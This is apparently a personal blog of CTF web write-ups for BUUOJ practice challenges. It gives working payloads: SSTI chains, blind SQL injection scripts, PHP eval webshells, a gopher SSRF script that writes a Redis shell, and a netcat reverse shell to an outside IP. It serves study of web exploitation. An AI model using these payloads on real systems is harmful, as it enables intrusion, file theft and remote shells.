web 刷题(三)

阅读数: 次 2020-12-02

[GYCTF2020]FlaskApp

2020.12.3

考点

ssti 注入

https://www.cnblogs.com/leixiao-/p/10227867.html

通用注入

做题步骤

# 查看更目录
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}
# 读源码
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}
# 列目录
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
# 文件打开
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}

更具题目名字知道是 python 的题目

打开网站测试功能

发现在解密中如果我们随便输入值，如果不能base64 解密的

会产生报错

关键报错信息。

但是加密处没有报错信息。

发现解密的时候我们的结果会直接输出，但是有一个 waf。如果触碰到就会打印no no no!!

所以我们可以利用我们的 ssti 先base64 加密然后在利用解密之后会显示的办法得到可能用到的信息。

测试

首先利用 2 在我们的加密中加密后复制到解密里面运行

发现返回 2 说明是存在 ssti 注入的

测试一般会利用的 ssti 注入代码
1
"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['open']('ls').read()
返回 nonono 发现不能使用应该是被过滤了

测试下面读文件代码发现可以使用
1
{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}

看看能不能读 app.py （根据报错得到的文件名的代码

 from flask import Flask,render_template_string 
 from flask import render_template,request,flash,redirect,url_for 
 from flask_wtf import FlaskForm 
 from wtforms import StringField, SubmitField 
 from wtforms.validators import DataRequired 
 from flask_bootstrap import Bootstrap 
 import base64 
 app = Flask(__name__) 
 app.config['SECRET_KEY'] = 's_e_c_r_e_t_k_e_y' 
 bootstrap = Bootstrap(app) 
 class NameForm(FlaskForm): 
    text = StringField('BASE64加密',validators= [DataRequired()]) 
    submit = SubmitField('提交') 
class NameForm1(FlaskForm): 
    text = StringField('BASE64解密',validators= [DataRequired()]) 
    submit = SubmitField('提交') 
    def waf(str): 
        black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"] 
        for x in black_list : 
            if x in str.lower() : 
                return 1 
    
    @app.route('/hint',methods=['GET']) 
    def hint(): 
        txt = "失败乃成功之母！！" 
        return render_template("hint.html",txt = txt) 
    
    @app.route('/',methods=['POST','GET']) 
    def encode(): 
        if request.values.get('text') : 
            text = request.values.get("text") 
            text_decode = base64.b64encode(text.encode()) 
            tmp = "结果 :{0}".format(str(text_decode.decode())) 
            res = render_template_string(tmp) flash(tmp) 
            return redirect(url_for('encode')) 
        else : 
            text = "" form = NameForm(text) 
            return render_template("index.html",form = form ,method = "加密" ,img = "flask.png") 
    
    @app.route('/decode',methods=['POST','GET']) 
    def decode(): 
        if request.values.get('text') : 
            text = request.values.get("text") 
            text_decode = base64.b64decode(text.encode()) 
            tmp = "结果 ： {0}".format(text_decode.decode()) 
        
            if waf(tmp) : 
                flash("no no no !!") 
                return redirect(url_for('decode')) 
        
            res = render_template_string(tmp) 
            flash( res ) 
            return redirect(url_for('decode')) 
        else : 
            text = "" 
            form = NameForm1(text) 
            return render_template("index.html",form = form, method = "解密" , img = "flask1.png") 
    
    @app.route('/&lt;name&gt;',methods=['GET']) 
    def not_found(name): 
        return render_template("404.html",name = name) 

if __name__ == '__main__': 
    app.run(host="0.0.0.0", port=5000, debug=True)

然后发现 waf 里面的字符串为

black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"]

利用字符串拼接绕过

1	{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

发现里面的 flag 文件名字

this_is_the_flag.txt

然后去得到 flag 的值

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}

[GWCTF 2019]枯燥的抽奖

2020.12.3

考点

做题步骤

点击check 发现会执行 check.php 的内容直接访问 check.php

3sLGMz8yD1

<?php
#这不是抽奖程序的源代码！不许看！
header("Content-Type: text/html;charset=utf-8");
session_start();
if(!isset($_SESSION['seed'])){
$_SESSION['seed']=rand(0,999999999);
}

mt_srand($_SESSION['seed']);
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){
    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);       
}
$str_show = substr($str, 0, 10);
echo "<p id='p1'>".$str_show."</p>";


if(isset($_POST['num'])){
    if($_POST['num']===$str){x
        echo "<p id=flag>抽奖，就是那么枯燥且无味，给你flag{xxxxxxxxx}</p>";
    }
    else{
        echo "<p id=flag>没抽中哦，再试试吧</p>";
    }
}
show_source("check.php");

当我们的输入等于 $str 才能得到 flag。

利用到了 mt_rand 来随机获取 str_long1 的字符串

直接搜索 mt_rand php 伪随机

https://www.freebuf.com/sectool/205240.html

利用 seed 爆破工具

https://www.openwall.com/php_mt_seed/ 利用版本 4.0 爆破

利用这个工具。首先我们要得到生成随机的随机数是什么。

str1='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
str2='y1SbUgTiip'
res = ''
for i in str2:
    j = str1.index(i)
    res += str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' '
print(res)
# 24 24 0 61 27 27 0 61 54 54 0 61 1 1 0 61 56 56 0 61 6 6 0 61 55 55 0 61 8 8 0 61 8 8 0 61 15 15 0 61

然后爆破随机数

利用已经有的随机数再利用 php_mt_seed 爆破工具得到对应的 seed

然后利用这个 seed 在写一遍 php代码得到我们需要的 $str 的值（直接复制源代码

<?php 
mt_srand(974665459);
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){
    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);       
}
echo "<p id='p1'>".$str."</p>";
# <p id='p1'>y1SbUgTiipcjjNSNLKLF</p>

得到对应的随机数

直接输入。得到flag

[CISCN2019 华东南赛区]Web11

2020.12.3

考点

Smarty的ssti注入

模板注入总结

https://www.cnblogs.com/bmjoker/p/13508538.html

做题步骤

先抓包

根据网页的提示利用 X-Forwarded-For 来构造 ip

我们修改为

X-Forwarded-For: {{7+7}}

返现返回包为

返回的是 14。说明存在 ssti 注入

为了验证是什么模板

测试返现是 Smarty 的模板注入。

利用得到 flag

1 2	{if system('cat /flag')}{/if} ##注意语句后面不需要分号。

[极客大挑战 2019]RCE ME

2020.12.4

考点

取反命令执行

Disable_function 绕过

做题步骤

登录后有个源代码

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

只能输入 A-Z a-z 0-9 的字符串

这里我们可以利用取反得到对应的字符串

最后会调用一个 @eval 函数。

利用取反得到字符串

php -r "echo urlencode(~'phpinfo');"
%8F%97%8F%96%91%99%90
(%8F%97%8F%96%91%99%90)();
/?code=(%8F%97%8F%96%91%99%90)();

发现命令实现调用

说明是可以命令执行的且发现是 php7

所以利用相同办法构造 shell。

<?php 
$a='assert';
$b=urlencode(~$a);
echo '(~'.$b.')(';

$c='(eval($_POST["jly"]))';
$d=urlencode(~$c);
echo '~'.$d.');';
 
 # (~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%DD%95%93%86%DD%A2%D6%D6);

这里我们利用assert 调用。因为 eval 不能动态调用。

所以我们要用 assert 来命令执行。

从而蚁剑链接。

发现根目录下 /flag 没有东西

尝试使用 /readflag 发现不能使用

发现 disable_function 很多不能调用。

pcntl_alarm,pcntl_fork,pcntl_waitpid,
pcntl_wait,pcntl_wifexited,pcntl_wifstopped,
pcntl_wifsignaled,pcntl_wifcontinued,
pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,
pcntl_signal,pcntl_signal_get_handler,
pcntl_signal_dispatch,pcntl_get_last_error,
pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,
pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,
pcntl_setpriority,pcntl_async_signals,
system,exec,shell_exec,popen,proc_open,
passthru,symlink,link,syslog,imap_open,ld,dl

利用蚁剑绕过

[BSidesCF 2019]Futurella

2020.12.4

考点

无

做题步骤

直接查看源码

得到flag

[MRCTF2020]套娃

2020.12.5

考点

%20 绕过下划线过滤

然后用 %0a

php 为序列号

做题步骤

打开网站什么都没有

查看源代码

发现提示

内容规定我们传入的值不能有 _ （下划线）但是我们传入的参数又是有下划线的

所以我们这里要学习绕过下划线利用 %20 这样可以绕过第一个 if 判断

然后我们要利用 %0a 来绕过第二个里面的正则判断。因为要让他用23333 开头 23333 结尾

Payload = b%20u%20p%20t=23333%0a

然后发现有个提示在 secrettw.php 里面

访问后发现提示

还是先看源码

发现有 jsfuck 的注释

运行看看发现弹窗。 post 一个 Merak

得到新的显示

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

简单看下代码。

ip 可以利用 xff 绕过

file_get_contents($_GET['2333']) 可以利用 data 伪协议绕过

Change 利用简单脚本可以得到 flag 的值

先绕过 23333 的值

?2333=data:text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=

然后绕过

change

<?php
function unchange($v){

    $re = '';
    for($i=0;$i<strlen($v);$i++){
        $re .= chr ( ord ($v[$i]) - $i*2 );
    }
    return $re;
}

$real_flag = unchange('flag.php');
echo base64_encode($real_flag);
?>
  # file=ZmpdYSZmXGI=

file=ZmpdYSZmXGI=

最后添加 xff 或者 Client-ip 标签

测试发现 xff 不能得到 flag

利用 client-ip 可以

Client-ip: 127.0.0.1

[WUSTCTF2020]颜值成绩查询

2020.12.5

考点

利用 ^ 异或实现盲注

做题步骤

输入1 有回显。

输出错误没有报错

发现可以利用 ^ 来实现功能注入。

import requests
import time
url='http://bf2faf6e-18c6-4325-9d76-623b9ab3d7c2.node3.buuoj.cn/index.php'
flag=''
for i in range(50):
    a = 32
    b = 128
    mid = (a+b)//2
    while(a<b):
        
         #stunum=0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1))>0)   爆表名
         
         #stunum=0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema=database())and(table_name='flag')),1,1))>0)  爆列名
         
        payload = url+"?stunum=0^(ascii(substr((select(group_concat(value))from(flag)),%d,1))>%d)"%(i,mid)
        re = requests.get(url=payload)
        if 'admin' in re.text:
            a = mid + 1
        else:
            b = mid
        mid = (a+b)//2
    time.sleep(0.2)

    if (mid==32|mid==128):
        break

    flag +=chr(mid)
    print(flag)

    
# flag{ef7b96d5-0663-4bfb-85c7-53104923b845}

得到 flag

[CISCN2019 总决赛 Day2 Web1]Easyweb

2020.12.6

考点

robots.txt 文件

文件备份

sql 盲注

Php 短标签

做题步骤

测试不知道怎么注入。

发现 robots.txt 里面有 bak 的备份文件

但是访问index.php.bak 没有结果

查看Index.php 源代码返现有个 image.php user.php

访问对应的 Bak 文件

只有image.php.bak 能够下载 image.php.bak

查看对应代码

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

发现里面有一个 sql 语句，且这个sql语句基本不存在过滤

测试发现可以利用盲注达到目的

还有一个字段是 password

import  requests

url = "http://92f7493d-303d-4ebf-aa5c-de3d1edd398d.node3.buuoj.cn/image.php?id=\\0&path="
# 爆破表   得到 images,users
# payload = "or id=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))>{1},1,0)%23" 
# 爆破字段   php(echo bin2hex('users');)   得到 username,password
# payload = "or id=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),{0},1))>{1},1,0)%23"
# 爆破username和password  username=admin
payload = "or id=if(ascii(substr((select password from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
    l = 1
    r = 130
    mid = (l + r)>>1
    while(l<r):
        payloads = payload.format(i,mid)
        print(url+payloads)
        html = requests.get(url+payloads)
        if "JFIF" in html.text:
            l = mid +1
        else:
            r = mid
        mid = (l + r)>>1
    result+=chr(mid)
    print(result)

得到密码后

发现有个文件上传

上传为伪造成 jpg 的一句话

发现上传的文件变成了 .php 结尾的

发现这样不能被访问。

蚁剑无法连接

但是提示我们传入的文件名为 a.jpg 上传的用户是 admin

猜测是讲我们的输入存入了 .log.php 中

修改 filename 为 <?php eval($_POST['jly']);?> 发现不能传输

然后把 php 删掉 <? eval($_POST['jly']);?> 能够用上传说明不能出现 php 字符串利用 php 短标签

<?=@eval($_POST['jly']);?>

发现可以上传

用蚁剑链接这个地方

发现能够获得权限

查看flag

[BSidesCF 2019]Kookie

2020.12.7

考点

Cookie 设置

做题步骤

一个登陆页面提示是 admin 登陆

然后根据提示我们利用抓包测试

然后cookie里添加 monster=admin

发现有对应输入的 username 和 password的时候不能执行

如果只是抓login 的包不输入 username 和 Password

返回包我们会看到 set-cookie 里面有个 username=; 说明我们还要加入 username

添加后查看返回包得到 flag

[FBCTF2019]RCEService

2020.12.7

考点

json 解析 (学习json https://www.cnblogs.com/skysoot/archive/2012/04/17/2453010.html)

prce

题目源码分析

preg_match 绕过方式。

做题步骤

打开网页

可以执行 {"cmd":"ls"}

提示有个 index.php

查看 wp 说的是题目是存在源码的

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

代码中过滤了很多东西

但是在代码开头利用

1	putenv('PATH=/home/rceservice/jail');

修改了对应的环境变量，我们只能用 绝对路径 来调用系统命令。

preg_match的绕过。可以直接利用多行绕过。

对于burp 抓包传值需要 Url 编码不能有空格

因为测试发现 {"cmd":"ls"} 可以使用我们去查看PATH 路径下的东西

1	{%0A"cmd":"ls /home/rceservice/jail"%0A} = %7B%0A%22cmd%22%3A%22ls%20/home/rceservice/jail%22%0A%7D

回显说明在这个目录下存在 ls 命令

我们再去查看下一个路径

1	{%0A"cmd":"ls /home/rceservice"%0A} = %7B%0A%22cmd%22%3A%22ls%20/home/rceservice%22%0A%7D

得到 flag 文件的路径。

然后我们要去查看这个 flag

因为修改了 path 地址

所以我们要用 cat 的绝对地址来得到值。/bin/cat 这样一个一个测试

1	{%0A"cmd":"/bin/cat /home/rceservice/flag"%0A} = %7B%0A%22cmd%22%3A%22/bin/cat%20/home/rceservice/flag%22%0A%7D

得到 flag

[GKCTF2020]EZ三剑客-EzWeb

2020.12.7

考点

Redis 写文件

ssrf

做题步骤

查看网页源码。发现一个注释 ?sercrt

访问这个目录

发现有很多路由表信息

eth0 
Link encap:Ethernet HWaddr 02:42:0a:d7:2b:09 
inet addr:10.215.43.9 Bcast:10.215.43.255 Mask:255.255.255.0 
UP BROADCAST RUNNING MULTICAST MTU:1450 Metric:1 
RX packets:83 errors:0 dropped:0 overruns:0 frame:0 
TX packets:74 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 
RX bytes:11442 (11.4 KB) TX bytes:12882 (12.8 KB) 
eth1 
Link encap:Ethernet HWaddr 02:42:ac:12:00:b1 
inet addr:172.18.0.177 Bcast:172.18.255.255 Mask:255.255.0.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:12 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 
RX bytes:936 (936.0 B) TX bytes:0 (0.0 B) 
lo 
Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 
UP LOOPBACK RUNNING MTU:65536 Metric:1 
RX packets:48 errors:0 dropped:0 overruns:0 frame:0 
TX packets:48 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:3792 (3.7 KB) TX bytes:3792 (3.7 KB)

对于这个数据是 ifconfig 的结果

猜测应该是 ssrf 的漏洞利用

https://xz.aliyun.com/t/2115#toc-2

尝试利用 file 协议看看能不能读到文件 file:///etc/passwd 这样不能读但是利用 file:/etc/passwd 就能绕过执行

发现成功读取到了

说明存在 ssrf 漏洞

尝试读取 index.php 文件利用 file:/var/www/html/index.php

然后查看源码发现注释

<?php
function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    echo curl_exec($ch);
    curl_close($ch);
}

if(isset($_GET['submit'])){
		$url = $_GET['url'];
		//echo $url."\n";
		if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
		{
			//var_dump($match);
			die('别这样');
		}
		curl($url);
}
if(isset($_GET['secret'])){
	system('ifconfig');
}
?>

代码里面过滤了file协议、dict协议、127.0.0.1和localhost 没有过滤http协议和gopher协议

利用 ssrf 去访问内网存活的服务。 http://10.215.43.x

然后

扫描得到

发现我们需要去扫描端口

说明我们要找的就是 10.215.43.11 然后还要扫描这个的端口。

然后对端口进行扫描

发现6379端口

发现有个报错

是一个 redis

https://www.cnblogs.com/-chenxs/p/11749367.html

https://xz.aliyun.com/t/4051

https://www.redteaming.top/2019/07/15/%E6%B5%85%E6%9E%90Redis%E4%B8%ADSSRF%E7%9A%84%E5%88%A9%E7%94%A8/

Gopher 协议可以说是SSRF中的万金油，。利用此协议可以攻击内网的 redis、ftp等等，也可以发送 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。

利用 redis 的绝对路径写 shell

import urllib
protocol="gopher://"
ip="10.215.43.11"      
port="6379"
shell="\n\n<?php system(\"cat /flag\");?>\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
	 "set 1 {}".format(shell.replace(" ","${IFS}")),
	 "config set dir {}".format(path),
	 "config set dbfilename {}".format(filename),
	 "save"
	 ]
if passwd:
	cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
	CRLF="\r\n"
	redis_arr = arr.split(" ")
	cmd=""
	cmd+="*"+str(len(redis_arr))
	for x in redis_arr:
		cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
	cmd+=CRLF
	return cmd

if __name__=="__main__":
	for x in cmd:
		payload += urllib.quote(redis_format(x))
	print payload
  
# gopher://10.215.43.11:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

然后输入框输入就能写文件了

然后 http://10.215.43.11/shell.php

得到 flag

[BJDCTF 2nd]duangShell

2020.12.7

考点

.swp 备份

反弹shell 的方法

做题步骤

有个 .swp 泄露（因为 vi 编辑防止意外关闭所产生的文件。

访问 .index.php.swp 下载备份文件

利用 vim -r 文件名 回复文件

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>give me a girl</title>
</head>
<body>
    <center><h1>珍爱网</h1></center>
</body>
</html>
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
   die("where is P3rh4ps's girl friend ???");
} else {
    $girl = $_POST['girl_friend'];
    if (preg_match('/\>|\\\/', $girl)) {
        die('just girl');
    } else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {
        echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";
    } else {
        //duangShell~~~~
        exec($girl);
    }
}

需要反弹 shell

可以直接利用 nc -e 参数 nc 47.95.28.118 8888 -e /bin/bash

girl_friend=nc 47.95.28.118 8888 -e /bin/bash 反弹shell
看wp害看到另一种方法

然后找到 flag

[BJDCTF 2nd]elementmaster

2020.12.8

考点

没啥学的

做题步骤

打开网站

查看源码

有两个 Id 应该是 hex 16进制

一个是 php 一个是 Po.

题目名字为可能是和元素有关。 Po 对应就是元素周期表的元素。

（不会了看了wp 发现很脑洞

#coding:utf-8
import requests

url='http://5efc7c9d-715e-4434-ab69-9ef3a7a99324.node3.buuoj.cn/'
flag=‘‘
element=[‘H‘, ‘He‘, ‘Li‘, ‘Be‘, ‘B‘, ‘C‘, ‘N‘, ‘O‘, ‘F‘, ‘Ne‘, ‘Na‘, ‘Mg‘, ‘Al‘, ‘Si‘, ‘P‘, ‘S‘, ‘Cl‘, ‘Ar‘,
        ‘K‘, ‘Ca‘, ‘Sc‘, ‘Ti‘, ‘V‘, ‘Cr‘, ‘Mn‘, ‘Fe‘, ‘Co‘, ‘Ni‘, ‘Cu‘, ‘Zn‘, ‘Ga‘, ‘Ge‘, ‘As‘, ‘Se‘, ‘Br‘,
        ‘Kr‘, ‘Rb‘, ‘Sr‘, ‘Y‘, ‘Zr‘, ‘Nb‘, ‘Mo‘, ‘Te‘, ‘Ru‘, ‘Rh‘, ‘Pd‘, ‘Ag‘, ‘Cd‘, ‘In‘, ‘Sn‘, ‘Sb‘, ‘Te‘,
        ‘I‘, ‘Xe‘, ‘Cs‘, ‘Ba‘, ‘La‘, ‘Ce‘, ‘Pr‘, ‘Nd‘, ‘Pm‘, ‘Sm‘, ‘Eu‘, ‘Gd‘, ‘Tb‘, ‘Dy‘, ‘Ho‘, ‘Er‘, ‘Tm‘,
        ‘Yb‘, ‘Lu‘, ‘Hf‘, ‘Ta‘, ‘W‘, ‘Re‘, ‘Os‘, ‘Ir‘, ‘Pt‘, ‘Au‘, ‘Hg‘, ‘Tl‘, ‘Pb‘, ‘Bi‘, ‘Po‘, ‘At‘, ‘Rn‘,
        ‘Fr‘, ‘Ra‘, ‘Ac‘, ‘Th‘, ‘Pa‘, ‘U‘, ‘Np‘, ‘Pu‘, ‘Am‘, ‘Cm‘, ‘Bk‘, ‘Cf‘, ‘Es‘, ‘Fm‘,‘Md‘, ‘No‘, ‘Lr‘,
        ‘Rf‘, ‘Db‘, ‘Sg‘, ‘Bh‘, ‘Hs‘, ‘Mt‘, ‘Ds‘, ‘Rg‘, ‘Cn‘, ‘Nh‘, ‘Fl‘, ‘Mc‘, ‘Lv‘, ‘Ts‘, ‘Og‘, ‘Uue‘]

for i in element:
        r=requests.get(url+i+‘.php‘)
        if r.status_code == 200:
                flag+=r.text
                print (flag)

得到一个 php

访问这个得到的 php 名字

查看wp 知道

跑出来是这个但是和我们对应的不一样我们需要访问的是 And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php

[网鼎杯 2018]Comment

2020.12.8

考点

https://blog.csdn.net/a3320315/article/details/104216070

Git 泄露

二次注入

sql 多行代码不能用单行注释符

sql load_file 读取文件

做题步骤

测试功能等。

爆破得到登录账号用户名 zhangwei 密码 zhangwei666

然后可以留言。

扫描目录

发现有个 .git 泄露
得到文件

得到 write_do.php 源码

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

根据源码。可以知道数据库有两个表 board comment

在 write 的时候 category title content 这三个变量可控

在 comment 的时候会直接从 board 里面取出来 category 直接拼接。我们可以利用 category 的内容来实现 2次注入

（控制 content 的值为 sql 语句的内容）这样网页显示的时候就会实现sql 注入。

且以为这里的 sql 语句是多行的。所以我们之前所用到的单行朱师傅 # 不能被使用。

我们只能使用多行注释符 /**/ 这样来实现注入。所以我们这里需要的就是利用我们的可控点修改 comment 里面的 insert 语句

比如

我们输入write的时候让 $category = ',content=xxxx,/*

在comment的时候让 $content = */# */ 闭合前面的多行注释。 # 注释后面的 ',内容。

$sql = "insert into comment
        set category = '$category',
            content = '$content',
            bo_id = '$bo_id'";
// 带入数据
$sql = "insert into comment
				set category = '',content=xxxx,/*',
				    content = '*/#',
				    bo_id = '$bo_id'";
// 变化后的数据
$sql = "insert into comment
				set category = '',content=xxxx,
				    bo_id = '$bo_id'";
// 这样我们就控制了 我们的sql 注入的 content 的值。

这样我们的 sql 语句读取 content 的内容时就会执行 xxxx 的功能。（不在是单存的字符串

接着我们先查看题目的权限

留言 ',content=user(),/*

然后点击详情留言 */#

得到

说明是 root 权限

说明我们的 flag 应该不是在 sql数据库中，我们要利用数据库去找到系统里面的 flag 的位置

然后查看服务器中有哪些用户

重新创建留言文章 ',content=(select load_file('/etc/passwd')),/*

详细留言 */#

得到服务器上的用户

可以发现最后有个 www 用户

这个用户会用到 /bin/bash
我们查看 www 目录的命令历史

重新创建留言文章 ',content=(select load_file('//home/www/.bash_history')),/*

详细留言 */#

发现创建了一个 .DS_Store 文件

然后是 cd 到 /tmp 目录下进行的解压等操作让讲文件 cp 到 /var/www/html 然后删除了 /var/www/html 里面的 .DS_Store 文件

但是我们的 /tmp/html 中还保存着 .DS_Store 文件

.DS_Store(英文全称 Desktop Services Store)是一种由苹果公司的Mac OS X操作系统所创造的隐藏文件，目的在于存贮目录的自定义属性，例如文件的图标位置或者是背景色的选择。相当于 Windows 下的 desktop.ini。

我们需要读取这个文件的内容获得一些有用信息

这里需要读取文件内容用到 load_file

重新创建留言文章 ', content=(select load_file('/tmp/html/.DS_Store')),/*

发现这样不能显示完我们的内容因为文件内有 \x00 不能吧能容全部显示、

要要利用 hex 转义然后输出才能得到全部内容

重新创建留言文章 ', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

利用 php hex2bin 转义

看到有一个 flag_8946e1ff1ee3e40f.php 文件名的文件

应该就是一个 flag
再次利用去读取里面的值 ',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

得到 flag

[Zer0pts2020]Can you guess it?

2020.12.9

考点

绕过 basename 函数

做题步骤

打开网页有个 source 可以看到源码

<?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
